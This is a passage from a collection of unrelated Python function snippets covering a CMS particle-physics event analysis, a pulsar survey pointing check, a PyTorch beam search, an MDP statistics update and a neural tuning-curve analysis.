MET_nom.SetPtEtaPhiM(self.PuppiMET_pt_nom,0.,event.PuppiMET_phi,self.PuppiMET_pt_nom)\n MET_jesUp.SetPtEtaPhiM(self.PuppiMET_pt_jesUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesUp)\n MET_jesDown.SetPtEtaPhiM(self.PuppiMET_pt_jesDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesDown)\n MET_jerUp.SetPtEtaPhiM(self.PuppiMET_pt_jerUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerUp)\n MET_jerDown.SetPtEtaPhiM(self.PuppiMET_pt_jerDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerDown)\n\n for ifatjet in idx_fatjet:\n if event.FatJet_btagHbb[ifatjet] > 0.3:\n self.isBoosted4B = True\n\n \n self.nJetsNoFatJet = len(jet_tlv_list)\n \n if self.isZtoNN:\n self.DPhi = abs(MET_tlv.DeltaPhi(H))\n else:\n self.DPhi = abs(V.DeltaPhi(H))\n \n self.VH_deltaR = H.DeltaR(V)\n \n jet_list_temp = []\n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n 
jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n if jet_tlv.DeltaR(H) < 0.8:\n jet_list_temp.append(ijet)\n if len(jet_list_temp) == 1:\n idx = jet_list_temp[0]\n self.H_chf = event.Jet_chHEF[idx]\n self.H_nhf = event.Jet_neHEF[idx]\n elif len(jet_list_temp) == 2:\n idx1 = jet_list_temp[0]\n idx2 = jet_list_temp[1]\n pt1 = event.Jet_pt[idx1]\n pt2 = event.Jet_pt[idx2]\n chf1 = event.Jet_chHEF[idx1]\n chf2 = event.Jet_chHEF[idx2]\n nhf1 = event.Jet_neHEF[idx1]\n nhf2 = event.Jet_neHEF[idx2]\n self.H_chf = (chf1*pt1+chf2*pt2)/(pt1+pt2) \n self.H_nhf = (nhf1*pt1+nhf2*pt2)/(pt1+pt2)\n elif len(jet_list_temp) == 3:\n idx1 = jet_list_temp[0]\n idx2 = jet_list_temp[1]\n idx3 = jet_list_temp[2]\n pt1 = event.Jet_pt[idx1]\n pt2 = event.Jet_pt[idx2]\n pt3 = event.Jet_pt[idx3]\n chf1 = event.Jet_chHEF[idx1]\n chf2 = event.Jet_chHEF[idx2]\n chf3 = event.Jet_chHEF[idx3]\n nhf1 = event.Jet_neHEF[idx1]\n nhf2 = event.Jet_neHEF[idx2]\n nhf3 = event.Jet_neHEF[idx3]\n self.H_chf = (chf1*pt1+chf2*pt2+chf3*pt3)/(pt1+pt2+pt3) \n self.H_nhf = (nhf1*pt1+nhf2*pt2+nhf3*pt3)/(pt1+pt2+pt3)\n\n\n\n for jet_tlv in jet_tlv_list:\n if abs(MET_tlv.DeltaPhi(jet_tlv)) < self.MinJetMetDPhi:\n self.MinJetMetDPhi = abs(MET_tlv.DeltaPhi(jet_tlv))\n\n\n for ijet in idx_jet:\n if event.Jet_btagDeepB[ijet] > self.MaxJetNoFatJetBTag:\n self.MaxJetNoFatJetBTag = event.Jet_btagDeepB[ijet]\n\n if not self.isData:\n for igenjet in range(event.nGenJetAK8):\n genjetAK8_tlv = ROOT.TLorentzVector()\n genjetAK8_tlv.SetPtEtaPhiM(event.GenJetAK8_pt[igenjet], event.GenJetAK8_eta[igenjet], event.GenJetAK8_phi[igenjet], event.GenJetAK8_mass[igenjet])\n if H.DeltaR(genjetAK8_tlv) < 0.8:\n self.H_hadronflavour = struct.unpack('B',event.GenJetAK8_hadronFlavour[igenjet])[0]\n self.H_partonflavour = event.GenJetAK8_partonFlavour[igenjet]\n self.btagToolAK4_deep.fillEfficiencies(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep = self.btagToolAK4_deep.getWeight(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep_up = self.btagToolAK4_deep_up.getWeight(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep_down = self.btagToolAK4_deep_down.getWeight(event,idx_jet,fatjet_idx_H)\n #search for AK4 jets which match with the subjets from the H\n ak4_subjets = []\n subjet1 = TLorentzVector()\n subjet2 = TLorentzVector()\n subjet1_idx = event.FatJet_subJetIdx1[fatjet_idx_H]\n subjet2_idx = event.FatJet_subJetIdx2[fatjet_idx_H]\n if subjet1_idx>=0. 
and subjet2_idx>=0.:\n subjet1.SetPtEtaPhiM(event.SubJet_pt[subjet1_idx],event.SubJet_eta[subjet1_idx],event.SubJet_phi[subjet1_idx],event.SubJet_mass[subjet1_idx])\n subjet2.SetPtEtaPhiM(event.SubJet_pt[subjet2_idx],event.SubJet_eta[subjet2_idx],event.SubJet_phi[subjet2_idx],event.SubJet_mass[subjet2_idx])\n for jetid in range(event.nJet):\n ak4jet = TLorentzVector()\n ak4jet.SetPtEtaPhiM(event.Jet_pt[jetid],event.Jet_eta[jetid],event.Jet_phi[jetid],event.Jet_mass[jetid])\n if ak4jet.DeltaR(subjet1)<0.4:\n ak4_subjets.append(jetid)\n if ak4jet.DeltaR(subjet2)<0.4:\n ak4_subjets.append(jetid)\n self.btagToolAK8_deep.fillEfficiencies(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep = self.btagToolAK8_deep.getWeight(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep_up = self.btagToolAK8_deep_up.getWeight(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep_down = self.btagToolAK8_deep_down.getWeight(event,ak4_subjets,fatjet_idx_H)\n ########### X and variables ############\n X = V + H\n if self.isZtoNN:\n X_chs = V_chs + H\n self.X_mass_chs = X_chs.M()\n\n if self.runJEC:\n X_nom = V + H_nom\n X_jesUp = V + H_jesUp\n X_jesDown = V + H_jesDown\n X_jerUp = V + H_jerUp\n X_jerDown = V + H_jerDown\n X_MET_nom = MET_nom + H_nom\n X_MET_jesUp = MET_jesUp + H_jesUp\n X_MET_jesDown = MET_jesDown + H_jesDown\n X_MET_jerUp = MET_jerUp + H_jerUp\n X_MET_jerDown = MET_jerDown + H_jerDown\n self.X_mass_nom = X_nom.M()\n self.X_mass_jesUp = X_jesUp.M()\n self.X_mass_jesDown = X_jesDown.M()\n self.X_mass_jerUp = X_jerUp.M()\n self.X_mass_jerDown = X_jerDown.M()\n self.X_mass_MET_nom = X_MET_nom.M()\n self.X_mass_MET_jesUp = X_MET_jesUp.M()\n self.X_mass_MET_jesDown = X_MET_jesDown.M()\n self.X_mass_MET_jerUp = X_MET_jerUp.M()\n self.X_mass_MET_jerDown = X_MET_jerDown.M()\n\n self.V_pt = V.Pt()\n self.V_eta = V.Eta()\n self.V_phi = V.Phi()\n self.V_mass = V.M()\n \n if self.isZtoNN:\n self.V_mass = 0.\n\n self.H_pt = H.Pt()\n self.H_eta = H.Eta()\n self.H_phi = H.Phi()\n self.H_M = H.M()\n self.H_mass = event.FatJet_msoftdrop[fatjet_idx_H]\n self.X_pt = X.Pt()\n self.X_eta = X.Eta()\n self.X_phi = X.Phi()\n self.X_mass = X.M()\n\n\n self.H_dbt = event.FatJet_btagHbb[fatjet_idx_H]\n self.BtagDeepB = event.FatJet_btagDeepB[fatjet_idx_H]\n self.DeepTagMD_H4qvsQCD = event.FatJet_deepTagMD_H4qvsQCD[fatjet_idx_H]\n self.DeepTagMD_HbbvsQCD = event.FatJet_deepTagMD_HbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZHbbvsQCD = event.FatJet_deepTagMD_ZHbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZbbvsQCD = event.FatJet_deepTagMD_ZbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_bbvsLight = event.FatJet_deepTagMD_bbvsLight[fatjet_idx_H]\n self.DeepTagMD_WvsQCD = event.FatJet_deepTagMD_WvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZvsQCD = event.FatJet_deepTagMD_ZvsQCD[fatjet_idx_H]\n self.H_tau21 = fatjet_tau21_list[fatjet_idx_H]\n self.H_tau41 = fatjet_tau41_list[fatjet_idx_H]\n self.H_tau42 = fatjet_tau42_list[fatjet_idx_H]\n self.H_tau31 = fatjet_tau31_list[fatjet_idx_H]\n self.H_tau32 = fatjet_tau32_list[fatjet_idx_H]\n self.VHDEta = abs(V.Eta() - H.Eta())\n\n \n \n if event.FatJet_subJetIdx1[fatjet_idx_H] >= 0:\n Hcsv1 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx1[fatjet_idx_H]]\n Hdeepcsv1 = event.SubJet_btagDeepB[event.FatJet_subJetIdx1[fatjet_idx_H]]\n else:\n Hcsv1 = -1.\n Hdeepcsv1 = -1.\n if event.FatJet_subJetIdx2[fatjet_idx_H] >= 0:\n Hcsv2 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx2[fatjet_idx_H]]\n Hdeepcsv2 = event.SubJet_btagDeepB[event.FatJet_subJetIdx2[fatjet_idx_H]]\n else:\n Hcsv2 = -1.\n Hdeepcsv2 = 
-1.\n \n self.H_csv1 = max(Hcsv1,Hcsv2)\n self.H_csv2 = min(Hcsv1,Hcsv2)\n self.H_deepcsv1 = max(Hdeepcsv1,Hdeepcsv2)\n self.H_deepcsv2 = min(Hdeepcsv1,Hdeepcsv2)\n\n\n if self.year == 2016:\n wp_loose = 0.2217\n wp_medium = 0.6321\n wp_tight = 0.8953\n elif self.year == 2017:\n wp_loose = 0.1522\n wp_medium = 0.4941\n wp_tight = 0.8001\n elif self.year == 2018:\n wp_loose = 0.1241\n wp_medium = 0.4184\n wp_tight = 0.7527\n\n if self.H_deepcsv2 > wp_loose:\n self.isHtobb = True\n if self.H_deepcsv1 > wp_medium and self.H_deepcsv2 > wp_loose:\n self.isHtobb_ml = True\n\n if self.MaxJetNoFatJetBTag > wp_loose:\n self.isMaxBTag_loose = True\n if self.MaxJetNoFatJetBTag > wp_medium:\n self.isMaxBTag_medium = True\n if self.MaxJetNoFatJetBTag > wp_tight:\n self.isMaxBTag_tight = True\n\n \n if self.H_mass != 0.:\n self.H_ddt = self.H_tau21 + 0.082 *np.log(self.H_mass*self.H_mass/self.H_pt)\n else:\n self.H_ddt = -1.\n \n self.X_tmass = np.sqrt(2.*V.Pt()*fatjet_tlv_list[fatjet_idx_H].Pt()*(1.-np.cos(fatjet_tlv_list[fatjet_idx_H].DeltaPhi(V))))\n if self.isZtoNN:\n self.X_mass = self.X_tmass\n else:\n self.X_mass = X.M()\n if self.X_mass > 750 and self.VH_deltaR > 2:\n if self.MinJetMetDPhi>0.5 and self.DPhi>2:\n for i,weight in enumerate(nncutflow_list):\n self.out.nncutflow_inc.Fill(i,weight)\n if self.VHDEta<1.3:\n for i,weight in enumerate(eecutflow_list):\n self.out.eecutflow_inc.Fill(i,weight)\n for i,weight in enumerate(mmcutflow_list):\n self.out.mmcutflow_inc.Fill(i,weight)\n \n if self.isZtoEE or self.isZtoMM or self.isZtoNN or self.isTtoEM:\n self.fillBranches(event)\n return True", "def inPointing(self, pulsar):\n # initialise offset_deg to be a big old number\n # FWHM is in arcmin so always multiply by 60\n offset_deg = 5.\n\n # loop over pointings\n for point in self.pointingslist:\n # do a really basic check first\n\n glterm = (pulsar.gl - point.gl)**2\n gbterm = (pulsar.gb - point.gb)**2\n offset_new = math.sqrt(glterm + gbterm)\n\n # if the beam is close enough, break out of the loop\n if offset_new < offset_deg:\n offset_deg = offset_new\n self.gain = point.gain\n self.tobs = point.tobs\n \n return offset_deg", "def analyze(self, event):\n\t\tJets = Collection(event, \"Jet\")\n\t\tjets = [j for j in Jets if j.pt >= 20]\n\t\tgenpart = Collection(event, \"GenPart\")\n\t\tgenParts = [l for l in genpart]\n\t\t# get the particles when they have a mother ---> getting the daughters only \n\t\tdaughters = [l for l in genpart if l.genPartIdxMother>= 0 ]\n\t\tevent.nIsr = 0\n\t\tfor jet in jets:\n\t\t\tif jet.pt <30.0: continue\n\t\t\tif abs(jet.eta )>2.4: continue\n\t\t\tmatched = False\n\t\t\tfor i,mc in enumerate(genParts):\n\t\t\t\t# if it's matched doesn't make sence to correct it\n\t\t\t\tif matched: break\n\t\t\t\t# check if it's quark from top or not\n\t\t\t\tif (mc.status!=23 or abs(mc.pdgId)>5): continue\n\t\t\t\tmomid = abs(genParts[mc.genPartIdxMother].pdgId)\n\t\t\t\tif not (momid==6 or momid==23 or momid==24 or momid==25 or momid>1e6): continue\n\t\t\t\tfor idau in range(len(daughters)) :\n\t\t\t\t\t# look for the products of the jet and match jet with gen daughters of the quark \n\t\t\t\t\tif i == daughters[idau].genPartIdxMother:\n\t\t\t\t\t\tdR = math.sqrt(deltaR2(jet.eta,jet.phi, daughters[idau].eta,daughters[idau].phi))\n\t\t\t\t\t\tif dR<0.3:\n\t\t\t\t\t\t\t# if matched escape\n\t\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t\tbreak\n\t\t\t# if not matched correct it \n\t\t\tif not matched:\n\t\t\t\tevent.nIsr+=1\n\t\t# fill the output with 
nisr\n\t\tself.out.fillBranch(\"nIsr\",event.nIsr)\n\t\tnISRweight = 1\n\t\t#https://indico.cern.ch/event/592621/contributions/2398559/attachments/1383909/2105089/16-12-05_ana_manuelf_isr.pdf\n\t\tISRweights_Mar17 = { 0: 1, 1 : 0.920, 2 : 0.821, 3 : 0.715, 4 : 0.662, 5 : 0.561, 6 : 0.511}\n\t\tISRweights_ICHEP16 = { 0: 1, 1 : 0.882, 2 : 0.792, 3 : 0.702, 4 : 0.648, 5 : 0.601, 6 : 0.515}\n\t\tISRweightssyst_Mar17 = { 0: 0.0, 1 : 0.040, 2 : 0.090, 3 : 0.143, 4 : 0.169, 5 : 0.219, 6 : 0.244}\n\t\tISRweightssyst_ICHEP16 = { 0: 0.0, 1 : 0.059, 2 : 0.104, 3 : 0.149, 4 : 0.176, 5 : 0.199, 6 : 0.242}\n\t\t\n\t\tif self.ICHEP16 == True and self.Mar17 == False:\n\t\t\tISRweights = ISRweights_ICHEP16\n\t\t\tISRweightssyst = ISRweightssyst_ICHEP16\n\t\t\t\n\t\telif self.ICHEP16 == False and self.Mar17 == True: \n\t\t\tISRweights = ISRweights_Mar17\n\t\t\tISRweightssyst = ISRweightssyst_Mar17\n\t\t\t\n\t\tnISRforWeights = int(event.nIsr)\n\t\tif event.nIsr > 6:\n\t\t\tnISRforWeights = 6\n\t\tC_ISR = 1.090\n\t\tC_ISR_up = 1.043\n\t\tC_ISR_down = 1.141\n\t\tnISRweight = C_ISR * ISRweights[nISRforWeights]\n\t\tnISRweightsyst_up = C_ISR_up * (ISRweights[nISRforWeights] + ISRweightssyst[nISRforWeights])\n\t\tnISRweightsyst_down = C_ISR_down * (ISRweights[nISRforWeights] - ISRweightssyst[nISRforWeights])\n\t\t\n\t\tself.out.fillBranch(\"nISRweight\",nISRweight)\n\t\tself.out.fillBranch(\"nISRttweightsyst_up\",nISRweightsyst_up)\n\t\tself.out.fillBranch(\"nISRttweightsyst_down\",nISRweightsyst_down)\n\n\n # ------ Forwarded Message --------\n # Subject: Re: question for ttbar ISR reweighting\n # Date: Sat, 14 Jan 2017 20:24:14 +0100\n # From: Manuel Franco Sevilla <[email protected]>\n #The [Nom, Up, Down] values we find for the events with Nisr = 0 are:\n #[1.090, 1.043, 1.141]: TTJets_Tune\n #[1.096, 1.046, 1.151]: TTJets_SingleLeptFromT\n #[1.116, 1.055, 1.185]: TTJets_DiLept\n\t\t\n\t\t\n\t\treturn True", "def beam_search(\n encoder_outputs,\n init, step, update,\n length_penalty=no_length_penalty,\n **kwargs\n):\n K = kwargs.get('beam', 5)\n mxlen = kwargs.get('mxlen', 100)\n bsz = encoder_outputs.output.size(0)\n device = encoder_outputs.output.device\n with torch.no_grad():\n extra = init(encoder_outputs, K)\n paths = torch.full((bsz, K, 1), Offsets.GO, dtype=torch.long, device=device)\n # This tracks the log prob of each beam. This is distinct from score which\n # is based on the log prob and penalties.\n log_probs = torch.zeros((bsz, K), dtype=torch.float, device=device)\n # Tracks the lengths of the beams, unfinished beams have a lengths of zero.\n lengths = torch.zeros((bsz, K), dtype=torch.long, device=device)\n last = paths[:, :, -1] # [B, K]\n\n for i in range(mxlen - 1):\n probs, extra = step(paths, extra)\n V = probs.size(-1)\n probs = probs.view((bsz, K, V)) # [B, K, V]\n if i > 0:\n # This mask is for all beams that are done.\n done_mask = (lengths != 0).unsqueeze(-1) # [B, K, 1]\n # Can creating this mask be moved out of the loop? 
It never changes but we don't have V\n # This mask selects the EOS token\n eos_mask = torch.zeros((1, 1, V), dtype=torch.uint8, device=device)\n eos_mask[:, :, Offsets.EOS] = 1\n # This mask selects the EOS token of only the beams that are done.\n mask = done_mask & eos_mask\n # Put all probability mass on the EOS token for finished beams.\n # Otherwise as the other beams get longer they will all give\n # up and eventually select this beam and all outputs become\n # the same.\n probs = probs.masked_fill(done_mask, -np.inf)\n probs = probs.masked_fill(mask, 0)\n probs = log_probs.unsqueeze(-1) + probs # [B, K, V]\n # Calculate the score of the beam based on the current length.\n path_scores = probs / length_penalty(lengths.masked_fill(lengths==0, i+1))\n else:\n # On the first step we only look at probabilities for the first beam.\n # If we don't then the probs will be the same for each beam\n # This means the same token will be selected for each beam\n # And we won't get any diversity.\n # Using only the first beam ensures K different starting points.\n path_scores = probs[:, 0, :]\n\n flat_scores = path_scores.view(bsz, -1) # [B, K * V]\n best_scores, best_idx = flat_scores.topk(K, 1)\n # Get the log_probs of the best scoring beams\n log_probs = probs.view(bsz, -1).gather(1, best_idx).view(bsz, K)\n\n best_beams = best_idx / V # Get which beam it came from\n best_idx = best_idx % V # Get the index of the word regardless of which beam it is.\n\n # Best Beam index is relative within the batch (only [0, K)).\n # This makes the index global (e.g. best beams for the second\n # batch example is in [K, 2*K)).\n offsets = torch.arange(bsz, dtype=torch.long, device=device) * K\n offset_beams = best_beams + offsets.unsqueeze(-1)\n flat_beams = offset_beams.view(bsz * K)\n # Select the paths to extend based on the best beams\n flat_paths = paths.view(bsz * K, -1)\n new_paths = flat_paths[flat_beams, :].view(bsz, K, -1)\n # Add the selected outputs to the paths\n paths = torch.cat([new_paths, best_idx.unsqueeze(-1)], dim=2)\n\n # Select the lengths to keep tracking based on the valid beams left.\n lengths = lengths.view(-1)[flat_beams].view((bsz, K))\n\n extra = update(flat_beams, extra)\n\n # Updated lengths based on if we hit EOS\n last = paths[:, :, -1]\n eoses = (last == Offsets.EOS)\n lengths = update_lengths(lengths, eoses, i + 1)\n if (lengths != 0).all():\n break\n else:\n # This runs if the loop didn't break meaning one beam hit the max len\n # Add an EOS to anything that hasn't hit the end. 
This makes the scores real.\n probs, extra = step(paths, extra)\n\n V = probs.size(-1)\n probs = probs.view((bsz, K, V))\n probs = probs[:, :, Offsets.EOS] # Select the score of EOS\n # If any of the beams are done mask out the score of this EOS (they already had an EOS)\n probs = probs.masked_fill((lengths != 0), 0)\n log_probs = log_probs + probs\n end_tokens = torch.full((bsz, K, 1), Offsets.EOS, device=device, dtype=paths.dtype)\n paths = torch.cat([paths, end_tokens], dim=2)\n lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)\n best_scores = log_probs / length_penalty(lengths).squeeze(-1)\n\n # Slice off the Offsets.GO token\n paths = paths[:, :, 1:]\n return paths, lengths, best_scores", "def updateVisitStatistics(self, s, a, s_) :\n self.N[s, a, s_] += 1\n self.Ntotal[s, a] += 1\n self.PHat[s, a] = self.N[s, a] / self.Ntotal[s, a]\n self.omega[s, a] = confidenceRadius(self.mdp, self.Ntotal[s, a], self.delta_)", "def _analyse(self, source='sdf', alpha = 0.05, n_bootstrap = 2000, \n\t\tbiphase_split_point = 0.5, biphase_select_resp = None):\n\t\t\n\t\t\n\t\t# Need to add capacity to handle two things:\n\t\t# Qualitative conditions ne\n\t\t# Conditions split - need to to deal with splitting a single dataset, where one part\n\t\t# is qualitiative and the other quantitative\n\t\t\n\t\t# For qualitative, the self.cond_tuning array is numerical. Replace with record\n\t\t# see Initial Chrom Analysis. Keep conditions as strings, and convert to numerical\n\t\t# for plotting (?). Where qualitative, only use bar plot, where mixed, split.\n\t\t## Add parameters to parameters dictionary\n\n\t\tself.parameters['biphase_split_point'] = biphase_split_point\n\t\tself.parameters['biphase_select_resp'] = biphase_select_resp\n\t\t\n\t\t# Organising source selection - raw and mov_avg not develoepd fully yet.\n\t\tsources = {'sdf': (self.spike_dens_func, self.CI_pos, self.CI_neg), \n\t\t\t\t 'mov_avg': 'doesnt exist yet, call it self.spike_mov_avg', \n\t\t\t\t 'raw': (self.conditions_hist_mean, \n\t\t\t\t\t\t self.conditions_hist_mean + 2*self.conditions_hist_stderr, \n\t\t\t\t\t\t self.conditions_hist_mean - 2*self.conditions_hist_stderr)}\n\t\t\t\t \n\t\tassert source.lower() in sources.keys(), ('Tuning source data \"%s\" is invalid '\n\t\t\t\t\t\t\t\t\t\t\t\t\t'select one of %s' %(source, sources.keys())) \n\t \n\t\t## Need to expand this functionality to the mean and CI_pos and CI_neg. 
Doing so for\n\t # raw and moving average is not a priority, using sdf and bootstrap is pretty good.\n\t # overall aim is to clean this function up to accomadte a number of tuning functinos\n\t # in a clear and easy to use fasion.\n\t \n\t\tn_con = self.parameters['conditions']\n\t\t\n\t\t# values for transient bar responses\n\t\tif self.parameters['stimulus'] == 'bar':\n\t\t\t\n\t\t\tresp, CI_pos, CI_neg = sources[source.lower()]\n\t\t\t\n\t\t\t\n\t\t\tif self.parameters['biphasic']:\n\t\t\t\t\n\t\t\t\t# Take max response for each half of each PSTH, including Conf Intvls\n\t\t\t\thalf = int(self.bins.size * biphase_split_point)\n\n\t\t\t\tmax_val_arg = (resp[:, :half].argmax(axis=1),\n\t\t\t\t\t\t\t resp[:, half:].argmax(axis=1)+half)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tmax_val = (resp[:, :half].max(axis=1),\n\t\t\t\t\t\t resp[:, half:].max(axis=1))\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_neg = (CI_neg[np.arange(n_con), max_val_arg[0]],\n\t\t\t\t\t\t\t\t CI_neg[np.arange(n_con), max_val_arg[1]])\n\t\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_pos = (CI_pos[np.arange(n_con), max_val_arg[0]],\n\t\t\t\t\t\t\t\t CI_pos[np.arange(n_con), max_val_arg[1]])\n\n\t\t\t\t# encode which of the two responses the data is attached to\n\t\t\t\tbiphas_id = np.zeros_like(np.hstack((self.conditions, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.conditions2)))\n\t\t\t\tbiphas_id[:self.conditions.size] = 1\n\t\t\t\tbiphas_id[self.conditions2.size:] = 2\n\n\n\t\t\t\t\t\t\t\t \n\t\t\t\tself.cond_tuning = np.vstack((np.hstack((self.conditions, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.conditions2)),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val_CI_neg),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val_CI_pos),\n\t\t\t\t\t\t\t\t\t\t\t biphas_id))\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t\t# Hertz for all condition tuning data.\n\t\t\t\tself.cond_tuning[1:-1,:] *= (1/self.bin_width)\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t\t# Percentage of confidence intervals\n\t\t\t\t# ci_perc = (100 * (1 - self.parameters['sdf_alpha']))\n\t\t\t\t\n\t\t\t\t# Labels\n\t\t\t\tidx = ['condition', 'max_resp', 'neg_CI', 'pos_CI', 'biphas_id']\n\t\t\t\t\n\t\t\t\t# Pandas object, with transpose of tuning array to data frame object \n\t\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), columns=idx)\n\t\t\n\t\t\t#non biphasic version of above\n\t\t\tif not self.parameters['biphasic']:\n\n\t\t\t\tmax_val_arg = resp[:, :].argmax(axis=1)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tmax_val = resp[:, :].max(axis=1)\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_neg = CI_neg[np.arange(n_con), max_val_arg]\n\t\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_pos = CI_pos[np.arange(n_con), max_val_arg]\n\t\t\t\t\t\t\t\t \n\t\t\t\tself.cond_tuning = np.vstack((self.conditions,\n\t\t\t\t\t\t\t\t\t\t\t max_val,\n\t\t\t\t\t\t\t\t\t\t\t max_val_CI_neg,\n\t\t\t\t\t\t\t\t\t\t\t max_val_CI_pos))\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t\t# Hertz for all condition tuning data.\n\t\t\t\tself.cond_tuning[1:,:] *= (1/self.bin_width)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t\t# ci_perc = (100 * (1 
- self.parameters['sdf_alpha']))\n\n\t\t\t\tidx = ['condition', 'max_resp', 'neg_CI', 'pos_CI']\n\n\t\t\t\t\t \n\t\t\t\t# transpose of tuning array to data frame object \n\t\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), columns=idx)\n\t\t\n\t\t\n\t\t# values for sinusoids/gratings\n\t\t## Note issue of temporal frequency tuning - need variable tf.\n\t\tif self.parameters['stimulus'] == 'grating':\n\t\t\t\n\t\t\tself.parameters['fft_alpha'] = alpha\n\t\t\tself.parameters['fft_number_bootstrap'] = n_bootstrap\n\t\t\t\n\t\t\tif source == 'sdf':\n\t\t\t\tprint ('WARNING, using a smoothed/filtered dataset will artificially increase'\n\t\t\t\t\t 'the amplitude of the DC component and decrease that of the F1') \n\t\t\t\n\t\t\tsources = {'sdf': self.conditions_trials_sdf,\n\t\t\t\t\t 'mov_avg': \"doesn't exist yet (?)\",\n\t\t\t\t\t 'raw': self.conditions_trials_hist}\n\t\t\t\n\t\t\tresp = sources[source]\n\t\t\t\n\t\t\ttemp_freq = self.parameters['temp_freq']\n\t\t\tstim_len = self.parameters['stimulus_length']\n\t\t\t\n\t\t\t# ensuring that the temp_freq is measured in the FFT whilst taking the maximum time.\n\t\t\t# on the basis of delt-f = 1 / n*del-t; stim_len*F1=factor; 1/(bin_width*F1)=min bins\n\t\t\t# number times greater than minimum can fit in stim_length \n\t\t\tfactor = np.floor(stim_len * temp_freq).astype('int')\n\t\t\t\n\t\t\t# number of bins to take - the window size necessary for temp_freq to be measured\n\t\t\tbins_take = np.floor(factor / (self.bin_width * temp_freq)).astype('int')\n\n\t\t\t# Frequency axis generation\n\t\t\tself.freq = fft.rfftfreq(bins_take, self.bin_width)\n\t\t\t\n\t\t\t#Checkign whether the temp_freq is in the FFT.\n\t\t\tassert self.freq[factor] == temp_freq, ('The calculated FFT F1 frequency (%s)'\n\t\t\t\t\t\t\t\t\t\t\t\t\t 'does not equal the Stimulus temp_freq (%s)'\n\t\t\t\t\t\t\t\t\t\t\t\t\t %(self.freq[bins_take], temp_freq))\n\n\t\t\t# Fourier Transform\n\t\t\tself.conditions_trials_fourier = fft.rfft(resp[:,:,:bins_take], axis=2)\n\t\t\t\n\t\t\t# Amplitude (peak-to-peak)\n\t\t\tself.conditions_trials_ampl = np.abs(self.conditions_trials_fourier)\n\t\t\t\n\t\t\t# normalising to dataset size, except the DC.\n\t\t\tself.conditions_trials_ampl[:,:,0] *= 1 / float(bins_take)\n\t\t\tself.conditions_trials_ampl[:,:,1:] *= 2 / float(bins_take)\n\t\t\t\n\t\t\t\n\t\t\t# Mean amplitudes and bootstrapped CI_intervals \n\t\t\tself.conditions_ampl_mean = np.mean(self.conditions_trials_ampl, axis=1)\n\t\t\t\n\t\t\tCI_pos, CI_neg = bootstrap(self.conditions_trials_ampl, alpha=alpha, \n\t\t\t\t\t\t\t\t\t n_bootstrap=n_bootstrap)\n\t\t\tself.conditions_ampl_CI_pos, self.conditions_ampl_CI_neg = CI_pos, CI_neg\n\t\t\t\n\t\t\t# isolating F0, F1, and F2 responses and compiling into a single table.\n\t\t\tconditions_f0 = self.conditions_ampl_mean[:,0]\n\t\t\tconditions_f1 = self.conditions_ampl_mean[:,factor]\n\t\t\tconditions_f2 = self.conditions_ampl_mean[:,2*factor]\n\t\t\t\n\t\t\t# Condition Tuning array\n\t\t\tself.cond_tuning = np.vstack((self.conditions,\n\t\t\t\t\t\t\t\t\t\t conditions_f0, CI_pos[:,0], CI_neg[:,0],\n\t\t\t\t\t\t\t\t\t\t conditions_f1, CI_pos[:,factor], CI_neg[:,factor],\n\t\t\t\t\t\t\t\t\t\t conditions_f2, CI_pos[:,2*factor], CI_neg[:,2*factor],\n\t\t\t\t\t\t\t\t\t\t conditions_f1/conditions_f0))\n\t\t\t\n\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t# Hertz for all condition 
